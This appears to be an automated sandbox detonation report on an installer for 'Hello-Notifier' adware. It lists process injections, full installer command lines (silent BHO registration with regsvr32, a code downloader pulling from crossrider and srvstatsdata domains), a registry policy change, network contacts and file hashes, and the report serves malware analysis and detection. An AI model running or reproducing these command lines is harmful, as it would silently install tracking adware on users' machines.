PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 2116 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 2116 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 2116 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 2116 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 700 wrote to memory of 2948 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
PID 700 wrote to memory of 2948 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
PID 700 wrote to memory of 2948 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
PID 700 wrote to memory of 2948 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{11111111-1111-1111-1111-110311791128} = "1" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe

"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"

C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe

"C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe"

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe" /installxpi /agentregpath='Hello-Notifier' /extensionfilepath='C:\Program Files (x86)\Hello-Notifier\37928.xpi' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /waitforbrowser=300 /extensionid=b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com /extensionversion=0.93 /prefsbranch=ab2c81c064b2f4808b3abef6f49041f37f562099a802243b2aad598abd7b264a4com37928 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/37928.rdf /extensionname='Hello-Notifier' /extensiondesc='Hello Notifier extention' /publishername='Hello-Notifier' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /showthankyoupage /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /installapp /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log' /downloadfromlocalpath='file://C:\Users\Admin\AppData\Local\Temp\nso408.tmp\extensionData'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /updateapp /dontsenddaily /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer-update /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe" /executebg /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'

C:\Windows\system32\taskeng.exe

taskeng.exe {7C836E48-4AFF-4099-9BC0-4F8A566DADB7} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe" /enablebho /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110311791128 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'

Network

Country Destination Domain Proto
US 8.8.8.8:53 update.srvstatsdata.com udp
SG 13.251.16.150:80 update.srvstatsdata.com tcp
US 8.8.8.8:53 errors.srvstatsdata.com udp
SG 13.251.16.150:80 errors.srvstatsdata.com tcp
US 8.8.8.8:53 stats.srvstatsdata.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 stats.mstatsserv.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 app-static.crossrider.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp

Files

\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\System.dll

MD5 00a0194c20ee912257df53bfe258ee4a
SHA1 d7b4e319bc5119024690dc8230b9cc919b1b86b2
SHA256 dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3
SHA512 3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667

\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\WrapperUtils.dll

MD5 7a18f06f0935a9e98a14d47d77064573
SHA1 58b12858557fb39cf876b6e76e585cf581b53590
SHA256 422a61da2bedfdc8167cb022b4b5e0ff8588dc1e6bd40b3c4ba97588836f1b0f
SHA512 356fa81d066db57054d5477e96d12ca9a5e9639731c06d61dc320dc52bf6054f603523e2da3751a96a4608dc19c20868ed3573ccdf3d32bef025035770a434e6

\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\StdUtils.dll

MD5 21010df9bc37daffcc0b5ae190381d85
SHA1 a8ba022aafc1233894db29e40e569dfc8b280eb9
SHA256 0ebd62de633fa108cf18139be6778fa560680f9f8a755e41c6ab544ab8db5c16
SHA512 95d3dbba6eac144260d5fcc7fcd5fb3afcb59ae62bd2eafc5a1d2190e9b44f8e125290d62fef82ad8799d0072997c57b2fa8a643aba554d0a82bbd3f8eb1403e

\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe

MD5 a4c3e2148c1e6f2298ca76e998d32efb
SHA1 309b580cf1386e24eba522c79c4d7ce2d1fd84a9
SHA256 7f0141ce147904a3c0debd19f46cb1111ce6315459b34b34b5039ed670862cd4
SHA512 234578790ff105eb7dde8ce6b785fbbd413a11aec85d6231bd4307ba229844eddb6060c7b5cc7ac545f901a8651966b02f350cb26fcc08c1dc7e0309455e5fc1

\Users\Admin\AppData\Local\Temp\nso408.tmp\nsislog.dll

MD5 e47100b70748fc790ffe6299cdf7ef2d
SHA1 ad2a9cd5f7c39121926b7c131816e7ba85aeead2
SHA256 271d539fe130276189e0a32b8a0bc9f08f2d92f7e17f85d88726735f14ea6144
SHA512 88452a9aeff453e7979df9240ab396cbc0c5d00efecda97df1e46f2ba1e9b5bfd990921e85d503beb4b35a1de7681390ba124eeeaf896f250717892ced133e93

memory/2116-37-0x0000000000700000-0x0000000000710000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log

MD5 64047dd1c5894f37adfa5ffade7e8ebd
SHA1 ce0f60a680e65944341c155d90156f0da98f7e6a
SHA256 463498413deb2a320122254c60d12f16a67ac3a3021c6ed2f3af1fcd743a8b7d
SHA512 96184d59ffb275ed2ec189baba9c12f32c093bcf6e0f80dd5931246face5e0db1660bf9669ff945b7e99b48964087b0c2d07d823abda393aa61e33e50e56a2f0

\Users\Admin\AppData\Local\Temp\nso408.tmp\InstallerUtils2.dll

MD5 8c17aa401cdc9bfe61b57f4d4bfec362
SHA1 8c580457b636bc30bedb476cebb9a50d9f02651d
SHA256 dfc863b01224a8d3bf35ef6064d6051aab295b9618db72647202f9ca97e45d19
SHA512 9fa29aab6cde651a0afb8cacf3dc2ee063b4351c7cf16c49668b2b59062914dbe53c93368e7b2a73a267c4d3eddd513fe7ac282422cf06397d2ad8839c3cd881

\Users\Admin\AppData\Local\Temp\nso408.tmp\nsisos.dll

MD5 69806691d649ef1c8703fd9e29231d44
SHA1 e2193fcf5b4863605eec2a5eb17bf84c7ac00166
SHA256 ba79ab7f63f02ed5d5d46b82b11d97dac5b7ef7e9b9a4df926b43ceac18483b6
SHA512 5e5e0319e701d15134a01cb6472c624e271e99891058aef4dfe779c29c73899771a5b6f8b1cd61b543a3b3defeaecaa080c9cc4e76e84038ca08e12084f128eb

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log

MD5 457e3a88c808886ecc7ba8040b67a506
SHA1 b1be22c75ebdad25a7850ac75aad2501dfd6e451
SHA256 d1d7f7fa66b4c005fa95ae337e89fcd41e188ce6cbc3d28676ce9dd598709983
SHA512 b77c1c0932e4699075d4490ab01dbbdc61f359d2ef9953180b81f450d5575060e8df3ad2e6a2d834a11c8ef32e55cb77996edd8f58f42af46739ae39192c8222

memory/2116-265-0x0000000000700000-0x0000000000709000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log

MD5 972f2f4d8fdb71a71afcade2f4e96220
SHA1 72d98eb2368e6e3f9f7ab2759d0337aa3e47f4c5
SHA256 e2ed3c0c5b039644f834a483da8febb51b4ef71f723a15ae7df50dd0b2fc5da5
SHA512 4d3a983f285239e95e42d45cb18c06071a45698fde224e8642df9ad2d267308fc843f9998f849bb1f4ea9599dc8d6026d36052eff7a08a5f798ff22d75fc1e66

\Users\Admin\AppData\Local\Temp\nso408.tmp\InstallerUtils.dll

MD5 895bc798fb0d31e5d3e584ae5701925b
SHA1 d5184d234c1768d3fe671be1512bb58688b37698
SHA256 050bcec7226cfe81328bd44de1091355d368f1e9183d232eef1f598ffbd3bc99
SHA512 b0b0a108f8c21e4f9420245646c546293ea1138580d47dae35b2e467bb2752d7c2cc9df490fdac9e2596acc258dfaa13df8bbf98d45c9f7d77418ac7fdf5cf7b

\Users\Admin\AppData\Local\Temp\nso408.tmp\UserInfo.dll

MD5 7579ade7ae1747a31960a228ce02e666
SHA1 8ec8571a296737e819dcf86353a43fcf8ec63351
SHA256 564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5
SHA512 a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

\Users\Admin\AppData\Local\Temp\nso408.tmp\inetc.dll

MD5 4c01fdfd2b57b32046b3b3635a4f4df8
SHA1 e0af8e418cbe2b2783b5de93279a3b5dcb73490e
SHA256 b98e21645910f82b328f30c644b86c112969b42697e797671647b09eb40ad014
SHA512 cbd354536e2a970d31ba69024208673b1dc56603ad604ff17c5840b4371958fc22bafd90040ae3fb19ae9c248b2cfce08d0bc73cc93481f02c73b86dbc0697b2

\Users\Admin\AppData\Local\Temp\nso408.tmp\md5dll.dll

MD5 0745ff646f5af1f1cdd784c06f40fce9
SHA1 bf7eba06020d7154ce4e35f696bec6e6c966287f
SHA256 fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70
SHA512 8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da

memory/2904-349-0x0000000000400000-0x0000000000499000-memory.dmp

memory/2116-367-0x0000000000400000-0x00000000005B6000-memory.dmp

memory/2116-438-0x0000000000700000-0x0000000000709000-memory.dmp

memory/2116-446-0x00000000037D0000-0x00000000037E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 064d2a2851c44f039fa89e24672ec065
SHA1 2b6a7e3b294a73c63d8d013541bd70617dfb026a
SHA256 f2d61b9b2d422007fc273a93c6718a7d7264e5245fde3d2716d40a63340fdd07
SHA512 93dcfc3ee338b98508f784470347789d4cb6a49fb4c2d0d3c28fc924477c577ff506da787ca6b71f79e3eeac85d63bf3ddc3dc6805d95cb22fbde4aceea5d397

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log

MD5 995d53ca0536f2ee156c81f2614c9b2e
SHA1 c56f2b1696ec78c70ca0255a2741bd84795e2136
SHA256 d697ed3d474ab83263555f59d5401b3a8a81a9a433e7152b2644f6813e61bba8
SHA512 17df65e3eb2375d35d670576faa8dd360d8d4ce6f74f0dce1d8ae0c1b1f30fa7ad46dfa31ee195748d44c4b73317247abdbaa0975ea9586f5d4b68d98da76301

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 6d586d990046caa6363e0cfcf654f198
SHA1 b2bac57dfd1fca1fdfe8c233febcb6486c54fa16
SHA256 7dccabfab5396ca85ac6c45ba244d25c58279dbec948cda456355ef32e7ca0a1
SHA512 199ea6c9c050c1182736adc04aa6b021a7ebf9afe486fdc551f3bf2191e102fb8e61aefa4d850d6714e24cd3cd109b172bcbd857601513bdcfa1095eea252b68

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 4cf2227b60c543ab53e2e4bc710700f4
SHA1 c1811d55523373c6144f165f48fec686cd31e7d1
SHA256 fdd5b3df83a9e8a15114785a58e8c65cbf0c577d2ea124db12646c587daca1cf
SHA512 d862d1d373820d03e6da4b19a4cfaa08c4bf213eec1059c3c08606eea393e31b04b1a135b58ef0e41dd8ac5a1a40777902423e41cfe0a6f02220f72e574caeea

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.Admin\extensions\b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com\skin\crossrider_statusbar.png

MD5 8b1eb9cb80417ec0022d278a44ab1dc7
SHA1 c49eb73f79e70b8ed96d91ef62f0bc344e41219a
SHA256 e358d97ba4c51b987fe73ea0ac0f14f9b2375e299f3e859fc37c21ab8b051ee6
SHA512 0324f2785d09f04c5be9ee77f1cb80a7afe06d66672baa862f63ec8ac59a2ae58199db91bb28e18409e918b222dcf09269013a270284213473ffa974d842c7d7

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 e6d0a9a8cb734bc1f13d57c730e129fa
SHA1 e5065caded5b9f4f7f38a6120d4b84b8aca33bfd
SHA256 f966a16b792a66563a303797075aa68ea471adbd7fcf0c9491604554c7224ee0
SHA512 802864ae5a1d50b0ad1e0acd5d922b116d68213c1792e7462fd0f1d314d2cfd1237d970e3e6577507180d6a2af947746a61798264602c19c292f89eaddf84485

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\ExecDos.dll

MD5 ebcf9f71d804abab3c2e5ce4c17dc22e
SHA1 17d13084e75cbfa5fbfdd0025e9a0ee5772ae765
SHA256 d387b725afbd2a6f9b44999278d21025fae55b391e45f7751b88dfb13511a993
SHA512 5576396c2d885c039668d7f401eeee583eb4de39e8497c3aaec32d47f4417a522fe6786c111d50a5fba7570f50e84144ef3a8aea42677d170e79114343c3a4a1

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 948956ea00a342ed2fbeb9b9d848cdb4
SHA1 3d4d189e3a86c349ebe8b9c18dde9763af31e8d2
SHA256 82176760af569cd0760edd89babe7daa0b6e66db583e70fe4783271e6da8f151
SHA512 05c5220da5c94e2a729ba70221519c26947a323df5a386261e87fcb1157e4e48e790789e6c75f66aa1847b4f044e90cb558da9eb46c678fc41704512d05603d8

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 f52e74224837f9291247a4024bed4c8c
SHA1 b6c916b2125f35b017c905814c18d1d65a8aba1f
SHA256 1db93820da20e9f0f0593b7f8673d1e4a8f8ef7b056e4f4b2e183411a3456863
SHA512 6c40cfe789be6702076090956ee567a2e3af2825dc728b026cb86b3b669c54d36af80cab6ed0e01e3cf6e97b28f8352e7aed45c8d76dedce832cdc384b3cf567

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 20936fe789ac5a514a121d89b2f12ee8
SHA1 3c870bcf7759eed6ff53035b536d3df06ec9b2a6
SHA256 bf3e287937ea58b4a02dfff54e42a51fb093b3d9ab676cec35e04c8bbf606cfd
SHA512 fb7970db528e36f600ba5dee318638e74378268642564df1fbfa7288fa67de205f6023f5c37904add46bb7065466439b377b48c8db03d479f33aca964737f6e3

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 c32aae898daaf1ce5c2c1245e1779e5e
SHA1 11ff845123b54eeb7d7dfbcae608103d98f93f25
SHA256 85e7571a25ad06b5bfdc6213dd353ebf317219cbf5e751af81c01b52ea631215
SHA512 93a531c2c58e9a64107f55f9047c7a7a1a4a1e69dfc4aef483b138af5bd7457d07167fa8476feea740b2d0b0bdb44de47b418998d5992d5c2c86f76b8cf41d68

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 b67172dc03787059255910a04e503c1f
SHA1 c5fa607ce7f49ea21be99e85c81e08b48ff6e6a6
SHA256 a5d9296206bb705d8ea2caa0296ea45b2534f7c0d306a7253f20e90a999f70e0
SHA512 835b1672a22466de661a78577f0234bc4ad941a2787acdf695589d1d68d7607328edf9f33f747f6d945b54b9a81fe0893d6af1671c8af054208450a17c61f7b3

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 e3e7b6547cbc72cd52dba5012113cbaf
SHA1 1c6f747cccd7034b81cf4907f236cbd098fd030b
SHA256 7333697624997e5b91986eed05d29c24e871c689ccf38aec78b1173936c628bd
SHA512 7fb9e707afc16da8e0d11dfd8244a345db58f59c6b8b9fc2eba3ba580432164805f715da797c93c7e1d4f9f3bc51cfb5afb3c740abc6901ecf56a6699d01e43f

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 1e1a99d240ed5b18da059b516f339f99
SHA1 48aa01a58ba7e98b3e080f7ada1c5697c198298b
SHA256 9a4fce8f4f6f6697f795220a9889a0063e4496ff568121ef98e2652eec323ad3
SHA512 8f1d26b539da067fa3f4cb616b8b165a0f0abd6e923ecf20a68039ab5c0ff139df236703f5b42ebc20b4c6c9d7e2385430ebef61a5c20e22311880b14c3f7634

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 24e88dfa25d52544039eed843dec878d
SHA1 a4a49a2ad1fca719e48ca91ec2690effe46c362f
SHA256 759ef12969121dbd07092c62b7d529584c4115e4690d736bdb5e82f7d41ee765
SHA512 7f3888685fd776f36941556c645aee0c692d447d75baad7600c2d36a47e0853f17c178f1e865b3ccde78634c2551eb0c08bb8db586afb42aedec9ccadd6b0822

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 9a294e54b99b6ce9d3903bfb7354f88e
SHA1 82a5811657bd9fe992269f140d0e64281500f098
SHA256 72c1270892564c368832db8c464c20b8982191a5f9f634cc6c5f4954c47126b7
SHA512 c0ac7cc9d90c35c980a533cef369d819da91eaeeae6569e04bf0c40fb9397aa263890a5a2570f3dca4e162d6e62afd56956dc3037e63909fc83e0c798a13d49e

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:20

Platform

win10v2004-20241007-en

Max time kernel

114s

Max time network

116s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

This detonation is the sandbox loading a dropped NSIS plugin on its own, not something the installer does. NSIS plugin exports expect the plugin calling convention (parent window, string size, variables block, stack pointer, extra parameters), whereas rundll32 calls ordinal #1 with its own arguments (instance handle, command-line string, show flag), so the 32-bit host reads the wrong data and crashes into WerFault. The crash is an artifact of running StdUtils.dll outside NSIS; behavioral5 shows the same pattern with System.dll.

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3008 wrote to memory of 4876 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3008 wrote to memory of 4876 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3008 wrote to memory of 4876 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

